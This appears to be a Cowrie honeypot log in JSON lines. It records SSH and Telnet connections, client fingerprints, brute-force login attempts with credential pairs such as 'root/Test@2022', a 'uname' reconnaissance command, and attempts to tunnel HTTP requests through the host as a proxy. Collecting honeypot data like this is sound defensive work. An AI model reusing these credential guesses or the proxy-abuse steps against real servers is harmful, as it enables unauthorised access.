{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T03:42:52.361505Z","src_ip":"212.227.125.160","session":"df7e66eb6d63"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:42:52.785122Z","src_ip":"212.227.235.229","session":"139feb80ccdd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:42:52.785998Z","src_ip":"212.227.235.229","session":"139feb80ccdd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:53.606436Z","src_ip":"212.227.125.160","session":"df7e66eb6d63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38388,"dst_ip":"1.2.3.4","dst_port":22,"session":"70a8cb18b653","protocol":"ssh","message":"New connection: 212.227.125.160:38388 (1.2.3.4:22) [session: 70a8cb18b653]","sensor":"my-vps","timestamp":"2025-08-31T03:42:53.861609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:42:53.863331Z","src_ip":"212.227.125.160","session":"70a8cb18b653"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:42:54.118262Z","src_ip":"212.227.125.160","session":"70a8cb18b653"}
{"eventid":"cowrie.session.closed","duration":"29.2","message":"Connection lost after 29.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:54.183228Z","src_ip":"212.227.125.160","session":"482411b28ffe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:42:55.225206Z","src_ip":"212.227.125.160","session":"70a8cb18b653"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:55.482763Z","src_ip":"212.227.125.160","session":"70a8cb18b653"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:55.484106Z","src_ip":"212.227.125.160","session":"f845acc2e264"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"root123","message":"login attempt [hadoop/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:42:58.517433Z","src_ip":"212.227.235.229","session":"139feb80ccdd"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:00.499956Z","src_ip":"212.227.235.229","session":"139feb80ccdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53692,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd1015d61d58","protocol":"ssh","message":"New connection: 212.227.235.229:53692 (1.2.3.4:22) [session: bd1015d61d58]","sensor":"my-vps","timestamp":"2025-08-31T03:43:02.324175Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:43:03.163604Z","src_ip":"212.227.125.160","session":"74acaa90bfd8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:43:03.164387Z","src_ip":"212.227.125.160","session":"74acaa90bfd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37493,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc7da4cb6157","protocol":"telnet","message":"New connection: 212.227.235.229:37493 (1.2.3.4:23) [session: fc7da4cb6157]","sensor":"my-vps","timestamp":"2025-08-31T03:43:09.427074Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33178,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab4478371557","protocol":"ssh","message":"New connection: 77.83.207.83:33178 (1.2.3.4:22) [session: ab4478371557]","sensor":"my-vps","timestamp":"2025-08-31T03:43:12.463707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:12.473827Z","src_ip":"77.83.207.83","session":"ab4478371557"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:12.514734Z","src_ip":"77.83.207.83","session":"ab4478371557"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:12.765069Z","src_ip":"77.83.207.83","session":"ab4478371557"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5149,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5149","sensor":"my-vps","timestamp":"2025-08-31T03:43:12.816153Z","session":"ab4478371557"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:12.867036Z","src_ip":"77.83.207.83","session":"ab4478371557"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40126,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dc74177aec4","protocol":"ssh","message":"New connection: 212.227.125.160:40126 (1.2.3.4:22) [session: 0dc74177aec4]","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.006488Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6115,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6115","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.008692Z","session":"ab4478371557"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.059086Z","src_ip":"77.83.207.83","session":"ab4478371557"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":12201,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12201","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.200551Z","session":"ab4478371557"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.250969Z","src_ip":"77.83.207.83","session":"ab4478371557"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.302026Z","src_ip":"77.83.207.83","session":"ab4478371557"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33281,"dst_ip":"1.2.3.4","dst_port":22,"session":"06b2c62c9a7c","protocol":"ssh","message":"New connection: 77.83.207.83:33281 (1.2.3.4:22) [session: 06b2c62c9a7c]","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.352456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.353369Z","src_ip":"77.83.207.83","session":"06b2c62c9a7c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.405171Z","src_ip":"77.83.207.83","session":"06b2c62c9a7c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.574788Z","src_ip":"212.227.125.160","session":"0dc74177aec4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.575565Z","src_ip":"212.227.125.160","session":"0dc74177aec4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.664015Z","src_ip":"77.83.207.83","session":"06b2c62c9a7c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28256,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28256","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.716784Z","session":"06b2c62c9a7c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.769449Z","src_ip":"77.83.207.83","session":"06b2c62c9a7c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":14916,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14916","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.914312Z","session":"06b2c62c9a7c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:13.966176Z","src_ip":"77.83.207.83","session":"06b2c62c9a7c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":25776,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25776","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.110257Z","session":"06b2c62c9a7c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.162335Z","src_ip":"77.83.207.83","session":"06b2c62c9a7c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.215206Z","src_ip":"77.83.207.83","session":"06b2c62c9a7c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33379,"dst_ip":"1.2.3.4","dst_port":22,"session":"a987d152fc4e","protocol":"ssh","message":"New connection: 77.83.207.83:33379 (1.2.3.4:22) [session: a987d152fc4e]","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.263963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.264683Z","src_ip":"77.83.207.83","session":"a987d152fc4e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.315049Z","src_ip":"77.83.207.83","session":"a987d152fc4e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.563093Z","src_ip":"77.83.207.83","session":"a987d152fc4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":28133,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:28133","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.614057Z","session":"a987d152fc4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.663990Z","src_ip":"77.83.207.83","session":"a987d152fc4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15271,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15271","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.804106Z","session":"a987d152fc4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.854155Z","src_ip":"77.83.207.83","session":"a987d152fc4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":537,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:537","sensor":"my-vps","timestamp":"2025-08-31T03:43:14.996184Z","session":"a987d152fc4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.046905Z","src_ip":"77.83.207.83","session":"a987d152fc4e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.097352Z","src_ip":"77.83.207.83","session":"a987d152fc4e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33473,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aa3f7443bc5","protocol":"ssh","message":"New connection: 77.83.207.83:33473 (1.2.3.4:22) [session: 6aa3f7443bc5]","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.148586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.149359Z","src_ip":"77.83.207.83","session":"6aa3f7443bc5"}
